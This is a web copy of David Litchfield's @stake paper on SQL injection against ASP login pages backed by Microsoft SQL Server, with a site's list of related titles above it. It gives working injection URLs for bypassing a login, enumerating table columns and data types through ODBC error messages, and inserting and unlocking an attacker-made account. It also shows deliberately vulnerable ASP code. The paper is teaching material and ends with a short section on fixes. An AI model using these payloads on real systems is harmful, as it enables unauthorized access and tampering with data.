Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security Architecture @stake http://www.atstake.



Similar documents
Exposed Database( SQL Server) Error messages Delicious food for Hackers

Understanding Sql Injection

Testing Web Applications for SQL Injection Sam Shober

Troubleshooting guide for errors in Active Server Pages and Microsoft Data Access Components

White Paper. Blindfolded SQL Injection

INTRODUCTION: SQL SERVER ACCESS / LOGIN ACCOUNT INFO:

ASP.NET Programming with C# and SQL Server

How To Create A Database Driven Website On A Computer Or Server Without A Database (Iis) Or A Password (Ict) On A Server (Iip) Or Password (Web) On An Anonymous Guestbook (Iit) On Your

SQL Injection for newbie

Blindfolded SQL Injection. Written By: Ofer Maor Amichai Shulman

Guarding Against SQL Server Attacks: Hacking, cracking, and protection techniques.

SECURING APACHE : THE BASICS - III

External Network & Web Application Assessment. For The XXX Group LLC October 2012

INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY

SQL Injection Are Your Web Applications Vulnerable?

Fasthosts ASP scripting examples Page 1 of 17

Data Mining Commonly Used SQL Statements

Web Applications Security: SQL Injection Attack

How to Copy A SQL Database SQL Server Express (Making a History Company)

ADO and SQL Server Security

Automating SQL Injection Exploits

SQL Injection. The ability to inject SQL commands into the database engine through an existing application

Gravity Forms: Creating a Form

Errors That Can Occur When You re Running a Report From Tigerpaw s SQL-based System (Version 9 and Above) Modified 10/2/2008

Advantage Database Server

SQL INJECTION ATTACKS By Zelinski Radu, Technical University of Moldova

USING MYWEBSQL FIGURE 1: FIRST AUTHENTICATION LAYER (ENTER YOUR REGULAR SIMMONS USERNAME AND PASSWORD)

BLIND SQL INJECTION (UBC)

Chapter 4 Accessing Data

Perl In Secure Web Development

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

SQL Injection. SQL Injection. CSCI 4971 Secure Software Principles. Rensselaer Polytechnic Institute. Spring

SOFTWARE INSTALLATION INSTRUCTIONS CLIENT/SERVER EDITION AND WEB COMPONENT VERSION 10

Webapps Vulnerability Report

Retrieving Data Using the SQL SELECT Statement. Copyright 2006, Oracle. All rights reserved.

Project 2: Web Security Pitfalls

How I hacked PacketStorm ( )

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

ODBC Client Driver Help Kepware, Inc.

Tips and Tricks SAGE ACCPAC INTELLIGENCE

In this topic we will cover the security functionality provided with SAP Business One.

Migration Manager v6. User Guide. Version

SQL Injection Vulnerabilities in Desktop Applications

Oracle Database: SQL and PL/SQL Fundamentals

Advanced PostgreSQL SQL Injection and Filter Bypass Techniques

Enhanced Model of SQL Injection Detecting and Prevention

SAP Business Objects Business Intelligence platform Document Version: 4.1 Support Package Data Federation Administration Tool Guide

How-To: MySQL as a linked server in MS SQL Server

SQL Injection January 23, 2013

Manipulating Microsoft SQL Server Using SQL Injection

ODBC Chapter,First Edition

Consulting. Personal Attention, Expert Assistance

SQL Injection in web applications

White Paper BMC Remedy Action Request System Security

Using Microsoft SQL Server A Brief Help Sheet for CMPT 354

Oracle SQL. Course Summary. Duration. Objectives

How do I share a file with a friend or trusted associate?

Title. Syntax. stata.com. odbc Load, write, or view data from ODBC sources. List ODBC sources to which Stata can connect odbc list

Duration Vendor Audience 5 Days Oracle End Users, Developers, Technical Consultants and Support Staff

Advanced SQL Injection

HELP DESK MANUAL INSTALLATION GUIDE

Troubleshooting CallManager Problems with Windows NT and Internet Information Server (IIS)

XMailer Reference Guide

CTF Web Security Training. Engin Kirda

Oracle Database: SQL and PL/SQL Fundamentals NEW

Release Notes For Versant/ODBC On Windows. Release

Linking Access to SQL Server

Beginning C# 5.0. Databases. Vidya Vrat Agarwal. Second Edition

Basic SQL Server operations

SQL Injection Protection by Variable Normalization of SQL Statement

TS2Mascot. Introduction. System Requirements. Installation. Interactive Use

Setting Up ALERE with Client/Server Data

CMP3002 Advanced Web Technology

Insert Survey Data into a Database: Dreamweaver & Access 2007

Maintaining Stored Procedures in Database Application

Accessing Your Database with JMP 10 JMP Discovery Conference 2012 Brian Corcoran SAS Institute

Oracle Database: SQL and PL/SQL Fundamentals

Accessing a Microsoft SQL Server Database from SAS on Microsoft Windows

Using Databases With LabVIEW

Security and Control Issues within Relational Databases

The software shall provide the necessary tools to allow a user to create a Dashboard based on the queries created.

Oracle Database: SQL and PL/SQL Fundamentals NEW

VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso

How To Understand The Error Codes On A Crystal Reports Print Engine

PaperClip Audit System Installation Guide

Connecting to Manage Your MS SQL Database

SelectSurveyASP Install Guide

SQL Injection. By Artem Kazanstev, ITSO and Alex Beutel, Student

Connect to a SQL Database with Monitouch

Technical Bulletin 005 Revised 2010/12/10

HansaWorld SQL Training Material

CSCI110 Exercise 4: Database - MySQL

Web Development using PHP (WD_PHP) Duration 1.5 months

Transcription:

Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security Architecture @stake http://www.atstake.com Introduction This document describes how to subvert the security of a Microsoft Internet Information Web Server that feeds into a SQL database. The document assumes that the web application uses Active Server Pages technology with Active Data Objects (ADO), though the same techniques can be used with other technologies. The techniques discussed here can be used to disassemble the SQL database's structure, bypass login pages, and retrieve and modify data. This does assume that attackers can run arbitrary SQL queries, which unfortunately is all too common due to a lack of understanding, or even a complete ignorance of this problem and subsequent coding techniques in an ASP page. For example - consider the following ASP code - from a login page: <%@ LANGUAGE="VBSCRIPT" %> <% Dim oconv, orsu Set oconv = Server.CreateObject("ADODB.Connection") oconv.open "DRIVER={SQL Server};SERVER=aeneas;UID=sa;PWD=;DATABASE=paper" Set orsu = oconv.execute("select * FROM tblusers WHERE username = '" & Request.Querystring("UserID") & "' AND password = '" & Request.Querystring("Password") & "'") if not orsu.eof then Session("UserID") = orsu ("username") Response.Redirect "loginsucceeded.asp" else Response.Redirect "loginfailed.asp" end if %> There are several problems with this page but before getting to those examine how it works. The client enters a user ID and password, which are passed into an SQL query, which is then executed. If the user ID and password exist in the tblusers the SQL server's response, known as a recordset, would be populated. If the user ID and/or password do not exist then the recordset would not be populated. The ASP code then checks to see if it has and redirects the user to loginsucceeded.asp and if the recordset has not been populated the user is redirected to loginfailed.asp. As was already stated there are several problems with this ASP page - there's an SQL login and password embedded in the code, that SQL login happens to be the most powerful account in the database and its password is still the default blank. As far as the coding is concerned though it is extremely dangerous: due to the fact that user supplied ID and password are being passed straight into the SQL query with out first being sanitised it gives an attacker bypass this login page. All she would need to do is populate the record set and to do this, without knowing a valid user ID and password is make the following request: http://server/login.asp?userid='%20or%201=1-- Rather than executing the SQL query the server was supposed to i.e.

SELECT * FROM tblusers WHERE username = 'foo' AND password = 'bar' it executed SELECT * FROM tblusers WHERE username = '' or 1=1-- Due to the "or" condition in this query always evaluating to true the recordset would be populated and the attacker would be logged in. The reason that the SQL query has been so drastically modified is because of the single quote mark in the parameter. In SQL queries strings are delimited by single quotes. Tacking on a -- on the end of the query stops SQL complaining about unclosed quote marks. This page is easy to by-pass using this "or" technique. Extended Introduction If this code was modified however such that an UPDATE occurred after to set, say, audit information this "or" technique would fail: <% Dim oconv, orsu Set oconv = Server.CreateObject("ADODB.Connection") oconv.open "DRIVER={SQL Server};SERVER=aeneas;UID=sa;PWD=;DATABASE=paper" Set orsu = oconv.execute("select * FROM tblusers WHERE username = '" & Request.Querystring("UserID") & "' AND password = '" & Request.Querystring("Password") & "'") if not orsu.eof then Session("UserID") = orsu ("username") Set orsu = oconv.execute("exec sp_audit '" & Request.Querystring("UserID") & "'") Response.Redirect "loginsucceeded.asp" else Response.Redirect "loginfailed.asp" end if %> As can be seen the code now has an "exec sp_audit" query so when the same request is made using the "or" technique the server produces an error: [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'. /login.asp, line 11 The reason this error occurs is because SQL queries that execute a stored procedure can't be conditional and the presence of "or" makes it so. At this point the login has failed and assuming the attacker does not have access the source of the ASP code, how can this login screen by by-passed? Down to business To do this the web application needs to be disassembled and this is done by using ODBC error messages. The attacker would start by requesting

http://127.0.0.1/login.asp?userid=aaa' Note the single quote at the end the end of this URL. This will produce the following error message: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'aaa' AND password = ''. What this has done is given the attacker a fragment of the query embedded in the ASP page - " AND password =". This also informs the attacker that one of the columns in the table is called "password". With knowledge of this it is now possible to enumerate the structure of the table where the user credentials are stored, learning its name and the name of every column in that table. They would do this by making the following request: http://127.0.0.1/login.asp?userid=ddd'%20group%20by%20(password)-- This would produce the following error message: [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblusers.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. As can be seethe attacker now has the table's name - tblusers and the name of another column in this table - username. They would then request: http://127.0.0.1/login.asp?userid=aaa'%20group%20by%20(username)-- producing [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblusers.lastloggedin' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Now the attacker has a third column name. They would keep repeating this process of substituting column names in a "group by" URL to step through the table enumerating all of the columns. But when would they know that all column names have been successfully enumerated? Assuming that the ASP code performs a "SELECT *..." then by using UNION the attacker could then work out the number of columns in the tblusers table. http://127.0.0.1/login.asp?userid=aaa'%20union%20select%20username%20from%20tblusers-- This request would produce this error [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

The attacker would then keep adding another username to the URL http://127.0.0.1/login.asp?userid=aaa'%20union%20select%20username,username%20from%20tblusers-- until this error message stopped. At this point counting the number of usernames in the request would give the number of columns that exist in the tblusers table. Once a list of all the column names has been retrieved the attacker would then need to work out what data type the column expected. To do this the COMPUTE clause would be used providing each column name as an argument: http://127.0.0.1/login.asp?userid=aaa'%20compute%20sum(username)-- producing the error Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument. As can be seen "username" is of data type nvarchar. Once this has been performed the attacker would then know the name of the table, each of the column's name in the table, and their respective expected data type. These three details are crucial if the attacker wished to INSERT into or UPDATE the table and to by-pass the login page these will be needed. The attacker would then set about creating their own account using an INSERT query: http://127.0.0.1/login.asp?userid=aaa' insert into tblusers(username,password,lastloggedin,status) values ('jsmith','secret','oct 31 2000 8:52PM','foo')-- Requesting this would not produce an error - to see if it was successful however, the attacker would just attempt to logon with a username of "jsmith" and a password of "secret". They may be successful. However, imagine that they received a message stating that their account was locked out. Notice in the above URL (%20s stripped out for clarity's sake) that one of the columns is called "status" - and the value "foo" was inserted. It would be a fair assumption to say that if the account were locked out this "status" column would hold the information about this. The attacker would need to set this value to what the application expects for it to consider the account not to be locked out. But how would the attacker know what to insert in this field? They wouldn't but if they could update it with the value of another user's value then this should give the application what it expects for the account not to be locked out. The difficulty with this is retrieving a results set with only one row. This can be done however using aggregate functions - MIN and MAX. A request would be made similar to http://127.0.0.1/login.asp?userid=aaa' UPDATE tblusers SET status = (select min(status) from tblusers) where username = 'jsmith' This query would produce one row in the recordset and update jsmith's "status" with the row that on evaluation produced the smallest value. All going according to plan the attacker has now by-passed the login page.

Summary Obviously the techniques described here could be used not just for by-passing login pages but also for enumerating the database tables so that data could be returned with query using the UNION operator - they bypass the issue that calling a "select * from sysobjects" as a second query would not have the results returned in the recordset and printed back to the client's screen. The fix All of this would "go away" if the ASP coder properly sanitised user input before letting it anywhere near an SQL query. Depending upon whether the input is a string or a number different methods are used. For strings the replace() function can be used. Replace(Request.Querystring("foobar"), "'", "'") This would replace an occurrence of a single quote with nothing - effectively stripping them out. In cases where there needed to be a single quote, though, say in a name like "O'Malley" or a user wishes to have a single quote in their password however the fix would be Replace(Request.Querystring("foobar"), "'", "' '") replacing a single quote with a two single quotes - the way to escape single quotes in SQL. If the input in question is numeric then using CInt will produce an error if the input is not a number. Alternatively it is possible to use IsNumeric() or in jscript IsNaN()

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information